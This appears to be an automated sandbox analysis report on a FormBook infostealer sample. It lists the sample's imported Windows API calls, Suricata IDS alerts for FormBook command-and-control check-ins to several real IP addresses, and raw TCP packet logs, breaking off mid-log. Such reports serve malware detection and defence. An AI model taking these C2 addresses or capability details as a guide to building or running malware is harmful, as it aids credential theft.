GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                                                                  GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                  ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                  ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                                                                  OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishGreat Britain
                                                                                                                                  EnglishUnited States

                                                                                                                                  Network Behavior

                                                                                                                                  Suricata IDS Alerts

                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-10-22T22:56:30.782310+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.552994188.114.97.380TCP
                                                                                                                                  2024-10-22T22:56:47.092076+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55306552.13.151.17980TCP
                                                                                                                                  2024-10-22T22:56:49.901782+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55308052.13.151.17980TCP
                                                                                                                                  2024-10-22T22:56:53.020839+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55309252.13.151.17980TCP
                                                                                                                                  2024-10-22T22:56:54.995827+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55310152.13.151.17980TCP
                                                                                                                                  2024-10-22T22:57:09.236356+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553160103.106.67.11280TCP
                                                                                                                                  2024-10-22T22:57:11.792564+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553171103.106.67.11280TCP
                                                                                                                                  2024-10-22T22:57:14.327473+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553184103.106.67.11280TCP
                                                                                                                                  2024-10-22T22:57:16.920286+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553196103.106.67.11280TCP
                                                                                                                                  2024-10-22T22:57:22.860956+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553212188.114.96.380TCP
                                                                                                                                  2024-10-22T22:57:25.455548+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553213188.114.96.380TCP
                                                                                                                                  2024-10-22T22:57:28.095585+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553214188.114.96.380TCP
                                                                                                                                  2024-10-22T22:57:30.667198+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553215188.114.96.380TCP
                                                                                                                                  2024-10-22T22:57:36.418936+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532163.33.130.19080TCP
                                                                                                                                  2024-10-22T22:57:38.963511+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532173.33.130.19080TCP
                                                                                                                                  2024-10-22T22:57:41.471377+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532183.33.130.19080TCP
                                                                                                                                  2024-10-22T22:57:44.059111+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5532193.33.130.19080TCP
                                                                                                                                  2024-10-22T22:57:50.026061+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553220217.70.184.5080TCP
                                                                                                                                  2024-10-22T22:57:52.573055+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553221217.70.184.5080TCP
                                                                                                                                  2024-10-22T22:57:55.121101+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553222217.70.184.5080TCP
                                                                                                                                  2024-10-22T22:57:57.606581+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553223217.70.184.5080TCP
                                                                                                                                  2024-10-22T22:58:03.728578+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55322494.23.162.16380TCP
                                                                                                                                  2024-10-22T22:58:06.241903+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55322594.23.162.16380TCP
                                                                                                                                  2024-10-22T22:58:08.699956+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55322694.23.162.16380TCP
                                                                                                                                  2024-10-22T22:58:11.229555+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55322794.23.162.16380TCP
                                                                                                                                  2024-10-22T22:58:17.396447+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553228103.224.182.24280TCP
                                                                                                                                  2024-10-22T22:58:19.957028+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553229103.224.182.24280TCP
                                                                                                                                  2024-10-22T22:58:22.627976+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553230103.224.182.24280TCP
                                                                                                                                  2024-10-22T22:58:25.173782+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553231103.224.182.24280TCP
                                                                                                                                  2024-10-22T22:58:30.955570+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553232209.74.64.18780TCP
                                                                                                                                  2024-10-22T22:58:33.520112+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553233209.74.64.18780TCP
                                                                                                                                  2024-10-22T22:58:36.071268+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553234209.74.64.18780TCP
                                                                                                                                  2024-10-22T22:58:38.635814+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553235209.74.64.18780TCP
                                                                                                                                  2024-10-22T22:58:44.668685+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55323665.21.196.9080TCP
                                                                                                                                  2024-10-22T22:58:47.257463+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55323765.21.196.9080TCP
                                                                                                                                  2024-10-22T22:58:49.776104+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55323865.21.196.9080TCP
                                                                                                                                  2024-10-22T22:58:52.300187+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55323965.21.196.9080TCP
                                                                                                                                  2024-10-22T22:58:58.205425+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532403.33.130.19080TCP
                                                                                                                                  2024-10-22T22:59:00.766304+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532413.33.130.19080TCP
                                                                                                                                  2024-10-22T22:59:03.372904+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532423.33.130.19080TCP
                                                                                                                                  2024-10-22T22:59:05.960240+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5532433.33.130.19080TCP
                                                                                                                                  2024-10-22T22:59:11.703664+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532443.33.130.19080TCP
                                                                                                                                  2024-10-22T22:59:14.238086+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532453.33.130.19080TCP
                                                                                                                                  2024-10-22T22:59:16.757788+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532463.33.130.19080TCP
                                                                                                                                  2024-10-22T22:59:19.353782+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5532473.33.130.19080TCP
                                                                                                                                  2024-10-22T22:59:26.225331+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532488.210.49.13980TCP
                                                                                                                                  2024-10-22T22:59:28.648693+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532498.210.49.13980TCP
                                                                                                                                  2024-10-22T22:59:31.229419+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5532508.210.49.13980TCP
                                                                                                                                  2024-10-22T22:59:33.674797+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5532518.210.49.13980TCP
                                                                                                                                  2024-10-22T22:59:39.969207+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55325294.23.162.16380TCP
                                                                                                                                  2024-10-22T22:59:42.814443+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55325394.23.162.16380TCP
                                                                                                                                  2024-10-22T22:59:45.245233+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55325494.23.162.16380TCP
                                                                                                                                  2024-10-22T22:59:48.035272+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55325594.23.162.16380TCP
                                                                                                                                  2024-10-22T23:00:05.311558+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553256188.114.97.380TCP

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 22, 2024 22:56:30.068485975 CEST5299480192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 22:56:30.074173927 CEST8052994188.114.97.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:30.074259996 CEST5299480192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 22:56:30.081974983 CEST5299480192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 22:56:30.087519884 CEST8052994188.114.97.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:30.780865908 CEST8052994188.114.97.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:30.782128096 CEST8052994188.114.97.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:30.782310009 CEST5299480192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 22:56:30.785337925 CEST5299480192.168.2.5188.114.97.3
                                                                                                                                  Oct 22, 2024 22:56:30.791074991 CEST8052994188.114.97.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:46.383563995 CEST5306580192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:46.389138937 CEST805306552.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:46.389224052 CEST5306580192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:46.405811071 CEST5306580192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:46.411608934 CEST805306552.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:47.091773987 CEST805306552.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:47.091932058 CEST805306552.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:47.092076063 CEST5306580192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:47.147456884 CEST805306552.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:47.147577047 CEST5306580192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:47.916908979 CEST5306580192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:48.935308933 CEST5308080192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:49.194924116 CEST805308052.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:49.195333004 CEST5308080192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:49.206492901 CEST5308080192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:49.212213039 CEST805308052.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:49.901544094 CEST805308052.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:49.901715994 CEST805308052.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:49.901782036 CEST5308080192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:49.957560062 CEST805308052.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:49.957681894 CEST5308080192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:50.713601112 CEST5308080192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:51.732425928 CEST5309280192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:51.737993956 CEST805309252.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:51.738111973 CEST5309280192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:51.749663115 CEST5309280192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:51.757018089 CEST805309252.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:51.757095098 CEST805309252.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:53.020669937 CEST805309252.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:53.020713091 CEST805309252.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:53.020777941 CEST805309252.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:53.020828962 CEST805309252.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:53.020838976 CEST5309280192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:53.020858049 CEST5309280192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:53.020876884 CEST5309280192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:53.021024942 CEST805309252.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:53.021073103 CEST5309280192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:53.030972004 CEST805309252.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:53.031055927 CEST5309280192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:53.260612011 CEST5309280192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:54.283586025 CEST5310180192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:54.289082050 CEST805310152.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:54.289185047 CEST5310180192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:54.296303988 CEST5310180192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:54.301723003 CEST805310152.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:54.995570898 CEST805310152.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:54.995696068 CEST805310152.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:54.995826960 CEST5310180192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:55.052386999 CEST805310152.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:56:55.052521944 CEST5310180192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:55.053288937 CEST5310180192.168.2.552.13.151.179
                                                                                                                                  Oct 22, 2024 22:56:55.058744907 CEST805310152.13.151.179192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:08.452213049 CEST5316080192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:08.458137989 CEST8053160103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:08.458276987 CEST5316080192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:08.469630003 CEST5316080192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:08.475265026 CEST8053160103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:09.202450037 CEST8053160103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:09.236270905 CEST8053160103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:09.236356020 CEST5316080192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:09.979280949 CEST5316080192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:10.998215914 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:11.004385948 CEST8053171103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:11.004498959 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:11.025197983 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:11.030970097 CEST8053171103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:11.758527994 CEST8053171103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:11.792469025 CEST8053171103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:11.792563915 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:12.541718960 CEST5317180192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:13.560170889 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:13.565942049 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:13.566971064 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:13.579629898 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:13.585557938 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:13.585577965 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:14.293406963 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:14.327363014 CEST8053184103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:14.327472925 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:15.088792086 CEST5318480192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.107116938 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.112533092 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:16.112668037 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.120002985 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.125339031 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:16.886214018 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:16.920070887 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:16.920285940 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.920933962 CEST5319680192.168.2.5103.106.67.112
                                                                                                                                  Oct 22, 2024 22:57:16.926628113 CEST8053196103.106.67.112192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:21.971230030 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:21.977217913 CEST8053212188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:21.977349043 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:21.987476110 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:21.992979050 CEST8053212188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:22.858637094 CEST8053212188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:22.860678911 CEST8053212188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:22.860955954 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:23.495991945 CEST5321280192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:24.513622046 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:24.519646883 CEST8053213188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:24.519738913 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:24.530455112 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:24.536034107 CEST8053213188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:25.453141928 CEST8053213188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:25.455481052 CEST8053213188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:25.455548048 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:26.047933102 CEST5321380192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:27.060930014 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:27.219150066 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:27.219575882 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:27.231601000 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:27.237215042 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:27.237394094 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:28.092438936 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:28.095503092 CEST8053214188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:28.095585108 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:28.729248047 CEST5321480192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:29.748965979 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:29.754482985 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:29.760962963 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:29.764935017 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:29.770694971 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:30.666951895 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:30.667082071 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:30.667197943 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:30.669820070 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:30.669908047 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:30.670980930 CEST5321580192.168.2.5188.114.96.3
                                                                                                                                  Oct 22, 2024 22:57:30.676459074 CEST8053215188.114.96.3192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:35.711349010 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:35.716730118 CEST80532163.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:35.716909885 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:35.726953983 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:35.732328892 CEST80532163.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:36.418745995 CEST80532163.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:36.418936014 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:37.231374979 CEST5321680192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:37.236901045 CEST80532163.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:38.248119116 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:38.254429102 CEST80532173.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:38.254509926 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:38.265424013 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:38.271037102 CEST80532173.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:38.959467888 CEST80532173.33.130.190192.168.2.5
                                                                                                                                  Oct 22, 2024 22:57:38.963510990 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:39.776748896 CEST5321780192.168.2.53.33.130.190
                                                                                                                                  Oct 22, 2024 22:57:39.783606052 CEST80532173.33.130.190192.168.2.5
